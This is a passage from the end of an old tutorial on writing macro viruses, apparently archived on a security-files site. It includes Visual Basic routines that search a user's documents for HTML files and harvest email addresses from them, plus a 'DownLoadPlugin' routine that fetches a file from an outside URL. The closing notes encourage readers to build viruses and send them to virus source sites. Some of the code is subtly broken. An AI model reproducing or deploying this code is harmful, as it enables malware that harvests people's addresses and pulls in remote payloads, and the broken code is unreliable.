FileName = StripNulls(WFD.cFileName)
If (FileName <> ".") And (FileName <> "..") Then
FindFilesAPI = FindFilesAPI + _
(WFD.nFileSizeHigh * MAXDWORD) + _
WFD.nFileSizeLow
FileCount = FileCount + 1
'List1.AddItem path & FileName
ggg = path & FileName
MsgBox ggg
Call try(ggg)
End If
Cont = FindNextFile(hSearch, WFD) ' Get next file
Wend
Cont = FindClose(hSearch)
End If
' if there are subdirectories
If nDir > 0 Then
' perform recursive search
For i = 0 To nDir - 1
FindFilesAPI = FindFilesAPI + _
FindFilesAPI(path & dirNames(i) _
& "\", SearchStr, FileCount, DirCount)
Next i
End If
End Function
Private Sub Search()
Dim SearchPath As String, FindStr As String
Dim FileSize As Long
Dim NumFiles As Integer, NumDirs As Integer
Screen.MousePointer = vbHourglass
'SearchPath = directory name
SearchPath = "C:\My Documents"
' FindStr = filename we are searching for
FindStr = "*.*htm"
FileSize = FindFilesAPI(SearchPath, FindStr, NumFiles, NumDirs)
Screen.MousePointer = vbDefault
End
End Sub
Private Sub try(fName)
On Error Resume Next
WindowSize = 5000
seekPoint = 1
Open fName For Binary As 1
Do While seekPoint < LOF(1)
VarString$ = String$(WindowSize, " ")
Get #1, seekPoint, VarString$
seekPoint = seekPoint + WindowSize - 50
AsIs = search_(VarString$)
Loop
Close #1
End Sub
Function mid_(a$, i, j1)
On Error Resume Next
s = 0
If i > 0 And (i + j1 - 1) <= Len(a$) Then
b$ = Mid$(a$, i, j1)
If b$ >= "a" And b$ <= "z" Then s = 1
If b$ >= "A" And b$ <= "Z" Then s = 1
If b$ >= "0" And b$ <= "9" Then s = 1
If b$ = "-" Or b$ = "_" Or b$ = "+" Or b$ = "." Or b$ = "@" Then s = 1
End If
mid_ = s
End Function
Function search_(a$)
On Error Resume Next
s$ = ""
For i = 1 To Len(a$)
If Mid$(a$, i, 1) = "@" Then
name_ = "": j = i
Do
j = j - 1
s = mid_(a$, j, 1)
Loop While s = 1
Do
j = j + 1
s = mid_(a$, j, 1)
If s = 1 Then name_ = name_ + Mid$(a$, j, 1)
Loop While s = 1
s = 0: k = 0
For j2 = 1 To Len(name_)
If Mid$(name_, j2, 1) = "@" Then k = k + 1
If Mid$(name_, j2, 1) = "." Then s = 1
Next
If k = 1 And s = 1 And Len(name_) > 5 And Left$(name_, 1) <> "@" And
Right$(name_, 1) <> "@" Then MsgBox name_
'Then UserForm1.addr.AddItem Name_
End If
If Mid$(a$, i, 1) <> "@" Then s$ = s$ + Mid$(a$, i, 1) Else s$ = s$ + " "
Next
search_ = s$
End Function
Download plugin
This is a little procedure will download a file from specified URL. This
method is good for those, who do not use lot of code (compact code). No need
to use crap ala filesize etc. Have a look on it and enjoy.
Procedure parameters:
DownLoadPlugin "URL of the plugin", "name of the plugin"
Code & Exemple:
Private Sub Download()
DownLoadPlugin "http://matrixvx.org", "plugin.plg"
End Sub
Public Declare Function DoFileDownload Lib "shdocvw.dll" (ByVal lpszFile As
String) As Long
Public Sub DownLoadPlugin(urlz As String, plugin As String)
Dim DL As Long
On Error GoTo errorz
If urlz$ = "" Then urlz$ = strUrl$
If strUrl$ = "" Then strUrl$ = urlz$
If Left(strUrl$, 4) <> "http" Then strUrl$ = "http://" & strUrl$
If Right$(strUrl$, 1) <> "/" Then strUrl$ = strUrl$ & "/"
If Left$(plugin$, 1) = "/" Then plugin = Mid$(plugin$, 2)
DL& = DownLoadPlugin(StrConv(strUrl$ & plugin$, vbUnicode))
Exit Sub
errorz:
MsgBox "Can't download the fucking file" & urlz & plugin$ & ".",
vbCritical,
"Oshibka - ERROR !!!!"
End Sub
-------------------------------------
8**********************************************8
8*************(Conclusion & Notes)*************8
8**********************************************8
Well, i hope this entire thing i wrote helped those of you who wanted to
learn how to
make a macro virus, make one =]
This is just the basics of it all- and a bit more extensive. Now it's your
duty to
expand your knowledge =] How can you do this? Well, just go and look for
sources to
MV's ( a good site is www.coderz.net ). Just surf around and you can find
them!
If you have any difficulty and need some help, feel free to email me and i
will help
as much as i can. Remember, to distibute viruses is illegal, to write them
isn't
Credits
by de@fuckmicrosoft.com
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
